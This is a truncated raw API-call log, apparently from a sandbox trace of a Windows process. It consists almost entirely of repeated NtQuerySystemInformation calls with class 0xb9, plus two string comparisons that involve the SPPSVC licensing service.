NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.815] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.823] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 